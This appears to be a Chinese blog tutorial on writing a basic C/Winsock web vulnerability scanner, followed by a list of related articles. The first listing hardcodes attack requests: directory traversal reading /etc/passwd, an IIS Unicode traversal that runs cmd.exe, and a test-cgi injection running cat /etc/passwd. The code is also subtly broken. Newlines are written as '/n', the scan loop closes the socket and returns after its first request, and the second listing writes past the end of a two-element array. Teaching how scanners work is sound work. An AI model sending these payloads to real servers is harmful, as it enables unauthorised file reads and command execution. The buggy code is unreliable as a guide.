编写漏洞扫描器

最新推荐文章于 2023-11-13 12:22:40 发布
最新推荐文章于 2023-11-13 12:22:40 发布
阅读量1k 收藏 4
点赞数 2
分类专栏: 编程技术 文章标签: socket initialization struct stream 服务器 server
编写漏洞扫描器

一、漏洞扫描器基本原理:
编写漏洞扫描器探查远程服务器上可能存在的具有安全隐患的文件是否存在,它的socket建立过程和上面的端口扫描器是相同的,所不同的是漏洞扫描器通常使用80端口,然后对这个端口发送一个GET文件的请求,服务器接收到请求会返回文件内容,如果文件不存在则返回一个错误提示,通过接收返回内容可以判断文件是否存在。发送和接收数据需要使用函数send()和recv(),另外对流中存在的字符串进行判断需要使用函数strstr(),这除了需要具备socket函数库的知识以外,还需要一些有关string函数库的知识。
二、简单的漏洞扫描源代码:
/********************/
/* 端口扫描器 源代码*/
/********************/


#include <stdio.h>


#include <string.h>


#include <winsock.h>


int main(int argc,char *argv[])


{


if(argc!=2){


printf("Useage : scan [IP address]/n");


return(1);


}


struct sockaddr_in blah;


struct hostent *he;


WSADATA wsaData;


int i;


WORD wVersionRequested;


SOCKET sock;


char buff[1024];


char *ex[10];


ex[1]="GET /../../../../etc/passwd HTTP/1.0/n/n";


ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/ HTTP/1.0/n/n";


ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0/n/n";


ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0/n/n";


ex[5]="GET /cgi-bin/test-cgi?/help&0a/bin/cat%20/etc/passwd HTTP/1.0/n/n";


ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0/n/n";


char *fmsg="HTTP/1.1 200 OK";


wVersionRequested = MAKEWORD( 1, 1 );


if (WSAStartup(wVersionRequested , &wsaData)){


printf("Winsock Initialization failed./n");


exit(1);


}


if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){


printf("Can not create socket./n");


exit(1);


}


sock = socket(AF_INET,SOCK_STREAM,0);


blah.sin_family = AF_INET;


blah.sin_port = htons(80);


blah.sin_addr.s_addr= inet_addr(argv[1]);


if ((he=gethostbyname(argv[1]))!=NULL){


memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);


}


else{


if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){


WSACleanup();


exit(1);


}


}


for (i=1 ; i<7; i++) {


if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){


send(sock,ex[i],strlen(ex[i]),0);


recv(sock,buff,sizeof(buff),0);


if(strstr(buff,fmsg)!=NULL){


printf("/nFound :%s/n", ex[i]);


}


}


closesocket(sock);


WSACleanup();


return(1);


}


}
这段代码可以检测六个漏洞,读者可以根据自己的需要增加漏洞扫描的数量。程序实现的很简洁,概括起来这段程序完成了一下四项工作:
1、连接目标主机SERVER;
2、向目标主机发送GET请求;
3、接收目标返回数据;
4、根据返回数据判断文件是否存在。
三、返回数值:
读者也许不明白,程序究竟依靠返回的什么数值判断文件是否存在的呢?现在让我们修改一下程序,仔细看一下返回来的究竟是什么内容,对上面的程序进行如下修改:
/************************/
/* 检测文件头内容 源代码*/
/************************/


#include <stdio.h>


#include <string.h>


#include <winsock.h>


int main(int argc,char *argv[])


{


if(argc!=2){


printf("Useage : scan [IP address]/n");


return(1);


}


struct sockaddr_in blah;


struct hostent *he;


WSADATA wsaData;


WORD wVersionRequested;


SOCKET sock;


char buff[4096];


char *ex[2];


ex[1]="GET /index.html HTTP/1.0/n/n";


ex[2]="GET /noindex.htm HTTP/1.0/n/n";


wVersionRequested = MAKEWORD( 1, 1 );


if (WSAStartup(wVersionRequested , &wsaData)){


printf("Winsock Initialization failed./n");


exit(1);


}


if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){


printf("Can not create socket./n");


exit(1);


}


sock = socket(AF_INET,SOCK_STREAM,0);


blah.sin_family = AF_INET;


blah.sin_port = htons(80);


blah.sin_addr.s_addr= inet_addr(argv[1]);


if ((he=gethostbyname(argv[1]))!=NULL){


memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);


}


else{


if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){


WSACleanup();


exit(1);


}


}


if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){


send(sock,ex[1],strlen(ex[1]),0);


recv(sock,buff,sizeof(buff),0);


printf("%s",buff);


send(sock,ex[2],strlen(ex[2]),0);


recv(sock,buff,sizeof(buff),0);


printf("%s",buff);


}


closesocket(sock);


WSACleanup();


return(1);


}
程序将检测文件进行了修改,指对“/index.htm”和“/noindex.htm”进行判断,因为index.htm是默认的页面,所以大多数情况下是存在于服务器上的,而noindex.htm则是没有找到文件的情况,通过对接收回来的流buff的printf()可以清楚地看到返回来的究竟是什么东西。
通过运行程序读者会看到类似下面的内容:
HTTP/1.1 200 OK
Date: Thu, 23 Aug 2001 10:59:31 GMT
Server: Apache/1.3.12 (Unix)
Last-Modified: Thu, 23 Aug 2001 10:44:11 GMT
ETag: "a9c96-b73e-3b84de7b"
Accept-Ranges: bytes
Content-Length: 46910
Connection: close
Content-Type: text/html
这个htm程序的头部说明,返回内容还会有很多,不过下面的内容就是正常的htm文件了,这个头是被隐藏的,所以大多数使用者在平时使用电脑过程中,不会发现htm文件的开始部位,还有一个这样的内容说明。这个头里面包含了很多信息,例如第一行的200 OK就是文件存在的意思,如果是404 NOT FOUND那么就是文件不存在,也就是这个内容才能够让漏洞扫描器正常工作,现在读者应该明白为什么我们编写的漏洞扫描器里面由foundmsg=HTTP/1.1 200 OK的语句了吧。
通过这个头还可以了解到对方服务器使用的是什么系统,例如:Server: Apache/1.3.12 (Unix)就是我们扫描的服务器使用的系统类型。

Python编写漏洞扫描器的方法
WELL_CODER的博客
09-25 946
这是一个简单的漏洞扫描器示例,它可以帮助你检测目标主机是否存在已知的安全漏洞。请注意,这只是一个基本的示例,实际的漏洞扫描器需要更多的功能和安全性考虑。我们将使用socket库进行网络通信,使用requests库发送HTTP请求,使用漏洞数据库来存储和比对漏洞信息。接下来,我们需要创建一个漏洞数据库,用于存储已知的漏洞信息。在进行漏洞扫描之前,我们需要获取目标主机的一些基本信息,例如IP地址和端口号。现在我们可以开始扫描目标主机了。如果我们在扫描过程中发现了新的漏洞,我们可以将其添加到漏洞数据库中。
自己动手编写SQL注入漏洞扫描器
12-24
自己动手编写SQL注入漏洞扫描器
用C写的一个扫描器源码
要饭's Blog
06-16 3541
#include #include // 编译时需使用的库 #pragma comment(lib,"wsock32.lib") // select()成员定义 #define ZERO (fd_set *)0 // 变量定义 int maxth, scanok, scannum; int portip, hoststart, hoststop, startport, endport;  //
如何自己开发漏洞扫描工具
热门推荐
smooth的博客
08-25 1万+
扫描器的设计思想是:灵活,易扩展,易修改,灵活的意思就是可单独执行专项漏洞的扫描,也可以批量执行集成的所有漏洞探测模块;易扩展的意思就是,新的漏洞检测模块可清晰简单的集成进扫描器;易修改,对各个漏洞扫描模块可根据特殊情况修改探测逻辑。 扫描器的使用 扫描器下载地址:https://gitee.com/samllpig/SafeTool-51testing 工具的详细安装教程:http://quan.51testing.com/pcQuan/lecture/117 先打开我们的扫描器看下界面: ..
漏洞扫描工具的编写
最新发布
Kali与编程
11-13 1172
编写漏洞扫描工具时,需要明确目标和扫描类型,并选择合适的编程语言和漏洞库。例如,对于漏洞扫描,我们需要从漏洞库中获取漏洞信息,并构建攻击请求,然后分析目标系统的响应来确定是否存在漏洞。漏洞扫描工具的基本原理是通过发送特定的数据包或请求到目标系统上的应用程序或服务,然后分析响应来确定系统中存在的漏洞和风险。扫描引擎会根据漏洞库中的信息构建攻击请求,并分析目标系统的响应来确定是否存在漏洞。需要注意的是,这只是一个简单的漏洞扫描工具示例,实际的漏洞扫描工具需要更复杂的算法和更全面的漏洞库来确保准确性和完整性。
python实现的漏洞扫描器
06-05
漏洞扫描器分为端口扫描模块、SSH弱口令扫描模块及OS识别模块。 使用Python语言编程实现。 有CMD执行和图形界面执行两种操作方式。 用户输入目标设备的IP地址及扫描的端口号范围,根据需要选择要扫描的内容,系统...
自己动手编写SQL注入漏洞扫描器C#源代码
03-16
本主题将深入探讨如何使用C#编程语言编写一个SQL注入漏洞扫描器,旨在帮助开发者理解和预防这类威胁。 首先,我们需要理解SQL注入的基本概念。SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的...
编写Wu-ftp漏洞扫描器
08-03
标题提到的“编写Wu-ftp漏洞扫描器”是指创建一个程序来检测Wu-FTP服务器的已知安全漏洞。Wu-FTP是一款经典的FTP(文件传输协议)服务器软件,曾广泛应用于Linux系统。描述中提到了一个特定的漏洞,即“格式化漏洞”...
自己动手编写SQL注入漏洞扫描工具
12-31
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
基于C语言的漏洞扫描器
05-02
用于信息安全专业的研究者,使用C语言编写,编译通过。
socket实现的最简单的web服务器示例
05-02
socket实现的最简单的web服务器示例源代码
python漏洞扫描器编写,用Python编写Web漏洞检测工具
weixin_42520374的博客
03-26 3237
作为单位的网络安全管理员,经常会遇到这样的情况,某些漏洞在互联网上被批露后,在用的扫描工具却无法及时集成。遇到这种情况,领导会说:“自己想办法,抓紧检测是否有这个漏洞。”很多人会告诉你可以用自行编写Poc这个方法,指的就是根据漏洞的简单原理写出对应的漏洞检测代码,用来验证漏洞是否存在。那么如何编写Poc呢?可能你会把它想象的无比困难。Python的出现,极大简化了Poc的编写过程,我们不需要再把时...
简单的漏洞扫描器
KAKA的博客
07-07 496
构造思路: 1.socket 连接获取 Banner --> 2.与存在漏洞的 Banner 集合进行对比 中间细节: 1.需要判断用户所给参数是否存在且是否有读权限 2.需要判断 Banner 是否存在,处理异常 学习 os sys socket 各个模块的基本使用 直接上代码: #!/usr/bin/python3` #-*- coding:utf-8 -*-` import socket import os import sys # 获取 Banner信息 def ret
linux c 编程之四 way-board.cgi 漏洞扫描器
ncnynl的专栏
09-07 3675
linux c 编程之四 way-board.cgi 漏洞扫描器一思路:前天玩了way-board.cgi这个漏洞,很不错。这个漏洞的说明:Way-board.cgi泄露系统文件漏洞,利用它可以容易得到主机的passwd及其他有相应权限的文件.具体手工利用一:利用www.google.com的搜索,搜索关键词“way-board.cgi”会得到很多的网址如:targetip/way-boa
一个WEB漏洞扫描系统的设计与实现(一)
lixunbao的专栏
12-21 3891
一个WEB漏洞扫描系统的设计与实现(一)一、关于我以及本文的背景    文章的标题有点唬人的味道。    首先,作为一个毕业还不到3年的普通本科生,我还没修炼成为WEB安全方面的行家;其次,作为一个总代码行数还不到5万的平凡开发人员,我也不是系统设计方面的能手。但是毕业后我到了一家大型的互联网公司,做了一段时间的WEB安全方面的工作,也确实积累了一些经验和心得,我是想借此机会来好好总结一番的。
【从零开始写漏扫】主机发现——自己动手写一个端口扫描器
halftion
04-23 4690
在本文中,我将尝试着使用Python3内置包和Scapy自己动手写一个端口扫描器,并手动实现常见的端口扫描方式。
源码漏洞扫描工具
yaka的专栏
04-27 1万+
1.HP fortify  SCA 扫描工具 主要是提供源码级别的安全漏洞扫描,可以输出完整的漏洞报告。支持业界主流的编程语言,支持各种操作系统平台,也能够支持集成在主流的IDE中。  对于java而言,只要有源代码即可完成扫描,对于C++而言,就比较痛苦一些,需要编译通过才允许对工程进行扫描。   扫描的原理是先把源码编译为fortify的中间语言代码,然后使用SCA分析引擎根据安全
python漏洞扫描器编写
04-26
好的,我理解您的问题是关于 Python 漏洞扫描器编写编写漏洞扫描器主要有两种思路:一种是基于已知的漏洞数据库进行扫描,另一种是基于漏洞特征进行扫描。以下是一个基于后一种思路的 Python 漏洞扫描器的简单实现: 1. 首先,需要使用 requests 库来发送 HTTP 请求获取目标网站的 HTML 页面,建议使用 GET 方法。 2. 然后,需要使用正则表达式对 HTML 页面进行分析,找到可能存在漏洞的代码,例如 eval() 函数、SQL 语句拼接等。 3. 接着,利用漏洞特征,编写针对目标网站的漏洞攻击脚本,例如 SQL 注入的攻击脚本。 4. 最后,使用多线程或异步的方式发送攻击脚本,验证目标网站是否存在漏洞,并输出扫描结果。 需要注意的是,编写漏洞扫描器需要严格遵循道德规范,不得进行非法攻击行为,以避免产生不良后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值